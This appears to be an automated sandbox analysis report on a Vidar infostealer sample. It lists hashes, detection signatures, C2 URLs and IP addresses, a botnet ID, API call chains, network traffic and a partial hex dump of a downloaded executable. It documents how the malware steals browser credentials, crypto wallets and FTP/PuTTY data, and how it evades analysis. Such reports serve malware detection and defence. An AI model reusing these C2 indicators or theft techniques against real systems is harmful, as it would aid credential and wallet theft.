Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1482922
MD5:	bea49eab907af8ad2cbea9bfb807aae2
SHA1:	8efec66e57e052d6392c5cbb7667d1b49e88116e
SHA256:	9b645f570116d3e10faa316981e4fcde6fe55417feced3385cfbb815c7df8707
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to hide user accounts

Contains functionality to inject code into remote processes

Found Tor onion address

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious Program Location with Network Connections

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to create new users

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://5.75.212.60/vcruntime140.dll;	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/sqls.dll	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/badges	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/0	Avira URL Cloud: Label: malware
Source: https://5.75.212.60//	Avira URL Cloud: Label: malware
Source: https://banana.incognet.io/	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/#	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/;	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/A	Avira URL Cloud: Label: malware
Source: https://t.me/armad2a	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/4	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/5	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/2	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/6	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dllnXq	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/H	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/EGIDHDHIDG	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/e	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/licies	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/freebl3.dllE	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "e0c99e9ff0b95355e8ec19c548ab0f83"}

Multi AV Scanner detection for domain / URL

Source: arpdabl.zapto.org	Virustotal: Detection: 11%	Perma Link
Source: https://5.75.212.60/sqls.dll	Virustotal: Detection: 11%	Perma Link
Source: https://5.75.212.60//	Virustotal: Detection: 11%	Perma Link
Source: https://5.75.212.60/0	Virustotal: Detection: 5%	Perma Link
Source: https://5.75.212.60/#	Virustotal: Detection: 11%	Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00406D50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00406CD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00410DF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA,	0_2_00408980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C7F6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C94A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C94A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9444C0 PK11_PubEncrypt,	0_2_6C9444C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C914420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C914420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C944440 PK11_PrivDecrypt,	0_2_6C944440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C9925B0

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\BFCAAEHJDB.exe

Unpacked PE file: 6.2.BFCAAEHJDB.exe.3370000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:49714 version: TLS 1.2

Source:	Binary string: freebl3.pdb source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdb source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.2781145830.000000003B860000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.2776697381.000000002F98F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to enumerate network shares

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA3896DF3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,		23_2_00007FFDA3896DF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA3896DAF NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,		23_2_00007FFDA3896DAF

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401110
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004099F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040A2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004156C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040C2E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00415EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	0_2_00414F80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040B390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00409D40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00415A70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040AAB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF6209447F3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FF6209447F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA389A0D3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDA389A0D3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38C1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDA38C1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0A5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0A5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0D5803 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0D5803
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0F5253 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0F5253
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC122FE3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_004153C0

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199747278259

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 45.8.98.78 ports 19063,0,1,3,6,9
Source: global traffic	TCP traffic: 204.8.84.94 ports 20578,0,2,5,7,8
Source: global traffic	TCP traffic: 68.148.96.106 ports 12385,1,2,3,5,8
Source: global traffic	TCP traffic: 82.165.57.155 ports 27813,1,2,3,7,8
Source: global traffic	TCP traffic: 68.53.161.168 ports 13749,1,3,4,7,9
Source: global traffic	TCP traffic: 73.62.1.179 ports 17850,0,1,5,7,8

Found Tor onion address

Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: KXEmxT2p.23.dr	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/

Connects to several IPs in different countries

Source: unknown

Network traffic detected: IP country count 12

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.6:49745 -> 91.92.250.213:1110
Source: global traffic	TCP traffic: 192.168.2.6:49758 -> 91.224.234.189:50444
Source: global traffic	TCP traffic: 192.168.2.6:49759 -> 81.6.45.56:33834
Source: global traffic	TCP traffic: 192.168.2.6:49760 -> 99.252.52.199:17541
Source: global traffic	TCP traffic: 192.168.2.6:49761 -> 68.148.96.106:12385
Source: global traffic	TCP traffic: 192.168.2.6:49762 -> 209.99.203.131:34320
Source: global traffic	TCP traffic: 192.168.2.6:49763 -> 70.18.38.5:28737
Source: global traffic	TCP traffic: 192.168.2.6:49764 -> 73.62.1.179:17850
Source: global traffic	TCP traffic: 192.168.2.6:49765 -> 45.8.98.78:19063
Source: global traffic	TCP traffic: 192.168.2.6:49766 -> 184.185.247.130:9859
Source: global traffic	TCP traffic: 192.168.2.6:49767 -> 82.165.57.155:27813
Source: global traffic	TCP traffic: 192.168.2.6:49768 -> 204.8.84.94:20578
Source: global traffic	TCP traffic: 192.168.2.6:49769 -> 5.64.137.68:11737
Source: global traffic	TCP traffic: 192.168.2.6:49770 -> 24.92.16.253:16063
Source: global traffic	TCP traffic: 192.168.2.6:49771 -> 91.149.237.69:26412
Source: global traffic	TCP traffic: 192.168.2.6:49772 -> 68.119.203.48:9756
Source: global traffic	TCP traffic: 192.168.2.6:49773 -> 68.53.161.168:13749
Source: global traffic	TCP traffic: 192.168.2.6:49774 -> 119.13.124.67:29762
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 95.165.139.85:43117
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 194.87.219.156:19047
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 75.97.173.28:14634
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 73.38.186.219:20033
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 173.230.128.232:26930
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 130.185.251.21:18735
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 67.166.47.100:15536
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 186.28.6.171:15230
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 91.194.11.174:19248
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 139.59.20.27:14719
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 24.124.34.93:27057
Source: global traffic	UDP traffic: 192.168.2.6:14604 -> 216.9.179.60:25750

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Wed, 24 Jul 2024 07:28:22 GMTAccept-Ranges: bytesETag: "40ef51109bddda1:0"Server: Microsoft-IIS/10.0Date: Fri, 26 Jul 2024 09:27:04 GMTContent-Length: 11989504Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 0a a1 a0 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 c2 8b 00 00 2c 2b 00 00 00 00 00 a0 d0 8b 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 60 b9 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 60 9a 00 99 00 00 00 00 60 99 00 22 50 00 00 00 e0 a8 00 00 7c 10 00 00 10 a2 00 9c c9 06 00 00 00 